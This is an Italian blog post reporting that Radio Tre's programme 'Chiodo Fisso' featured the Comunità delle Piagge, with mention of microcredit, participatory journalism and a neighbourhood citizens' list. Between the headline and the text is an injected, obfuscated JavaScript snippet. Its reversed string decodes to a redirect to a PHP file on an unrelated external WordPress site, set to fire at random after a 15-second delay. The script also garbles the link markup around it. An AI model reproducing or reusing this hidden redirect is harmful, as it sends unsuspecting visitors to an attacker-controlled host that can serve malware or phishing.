Radio Tre racconta le Piagge: su Chiodo Fisso del 17 novembre

image_pdfimage_print

Radio Tre racconta le Piagge nella trasmissione “Chiodo fisso”

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.radio3.rai.it/dl/radio3/programmi/puntata/ContentItem-a8cf572f-8fe0-43b4-b19e-af52924c67b0.html”>Le attività della Comunità delle Piagge sono state protagoniste mercoledì 17, della trasmissione Chiodo Fisso di Radio Tre Rai.

[Scarica qui il file mp3 e ascolta la trasmissione, durata 7,30 minuti]

A raccontare le proposte sociali, culturali e politiche della Comunità delle Piagge è Cristiano Lucchi, educatore e giornalista. Approfondimenti sono stati dedicati ai progetti di microcredito, giornalismo partecipativo e alla lista di cittadinanza che ha espresso una consigliera di quartiere piaggese.

La trasmissione Chiodo Fisso, curata da Loredana Rotundo, affronta nel mese di novembre la parola chiave Volontariato. E’ ascoltabile anche on line all’indirizzo www.radio3.rai.it.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *